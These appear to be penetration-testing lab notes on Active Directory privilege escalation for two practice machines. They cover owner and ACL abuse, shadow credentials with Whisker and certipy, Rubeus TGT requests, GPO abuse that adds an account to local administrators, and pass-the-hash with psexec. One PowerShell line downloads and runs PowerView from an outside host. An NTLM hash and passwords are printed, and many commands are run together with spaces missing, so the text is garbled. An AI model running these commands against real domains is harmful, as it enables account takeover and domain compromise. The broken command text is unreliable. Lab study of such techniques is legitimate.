# DC FQDN should be defined in DNS server or host file.cmeldap $RHOST -ulibrary-plibrary--bloodhound-ns $RHOST -call
Amelia.Griffth (1) is a member of legacy group (2), which has WriteDACL (3) to GPO ADM Account (4). The GPO ADM has GenericAll (5) to Default Domain policy GPO (6). The Privilege Escalation step should be:
Change WriteDACL to GenericAll to Amelia.Griffiths to abuse the GPO ADM account.
Create a Shadow account for GPO ADM account for your backdoor access (or just change the password of GPO ADM account).
Create a new task in the Default Domain policy GPO with the shadow account credential or new password changed.
Execution
# Import PowerviewPS> iex (new-Object Net.WebClient).DownloadString('http://10.8.0.251/privesc/PowerView.ps1')|Import-Module PowerView.ps1
# Search the owner of the GPO and set the onwer to Amelia.Griffiths (Your owned account)PS> Get-ADUser -Identity "gpoadm" | ForEach-Object { Get-ACL "AD:\$($_.DistinguishedName)" | Select-Object -ExpandProperty Owner }
PS> Set-DomainObjectOwner-Identitygpoadm-OwnerIdentityAmelia.Griffiths# Add GenericAll to Amelia.Griffiths, targetting to GPOADM account. PS> Add-DomainObjectAcl-Rights'All'-TargetIdentity"GPOADM"-PrincipalIdentity"Amelia.Griffiths"-Verbose# 1) Shadow Account case # 1.1) Create a Shadow account .\Whisker.exeadd/target:gpoadm/domain:baby2.vl/dc:dc.baby2.vl/path:C:\temp\cert.pfx/password:Password0-# 1.2) Get TGT .\Rubeus.exe asktgt /user:gpoadm /certificate:C:\temp\cert.pfx /password:"Password0-" /domain:baby2.vl /dc:dc.baby2.vl /getcredentials /show
# 2) Change the password case PS> $UserPassword =ConvertTo-SecureString'Password0-'-AsPlainText-ForcePS> Set-DomainUserPassword-IdentityGPOADM-AccountPassword $UserPassword # Abuse GPO# Check Bloodhound for GPO-id for Default Domain policy GPO. # NTLM hash credentialpython3 pygpoabuse.py baby2.vl/GPOADM -hashes :51B4E7AEE2FBDD4E36F2381115C8FE7A -gpo-id "31B2F340-016D-11D2-945F-00C04FB984F9" -command 'net localgroup administrators GPOADM /add' -dc-ip $RHOST
# Passowrd credential python3 pygpoabuse.py baby2.vl/GPOADM:'Password0-' -gpo-id "31B2F340-016D-11D2-945F-00C04FB984F9" -command 'net localgroup administrators GPOADM /add' -f -dc-ip 10.10.91.214
# Update the GPO gpupdate/force# Check the command resultnetusergpoadm# Connect to the Targetimpacket-psexecbaby2.vl/gpoadm@$RHOST -hashes:51B4E7AEE2FBDD4E36F2381115C8FE7A
Case 2
Preparation
# Get TGT for a userimpacket-getTGT'absolute.htb/d.klay:Darkmoonsky248girl'-dc-ip $RHOST# Inject it into memory export KRB5CCNAME=./d.klay.ccache
Get a Bloodhound result below. The m.lovegod owns the Network Audit group, which has GenericWrite on the winrm_user user.
To get access to the machine, I’ll first I’ll need to give m.lovegod write access on the Network Audit group. Then I can add m.lovegod to the group. Finally, I can use those permissions to create a shadow credential for the winrm_user account to access to the machine via evil_winrm.
Update the ownership of the user to add a 'write permission'.
# Let's find ADCS environment. You will see some ADCS configurations. KRB5CCNAME=./d.klay.ccachecertipyfind-usernamem.lovegod@absolute.htb-k-targetdc.absolute.htb# Let's add the shadow credential to the winrm_user user KRB5CCNAME=./d.klay.ccache certipy shadow auto -username m.lovegod@absolute.htb -account winrm_user -k -target dc.absolute.htb
# Let's connect to the machineKRB5CCNAME=./winrm_user.ccacheevil-winrm-idc.absolute.htb-rabsolute.htb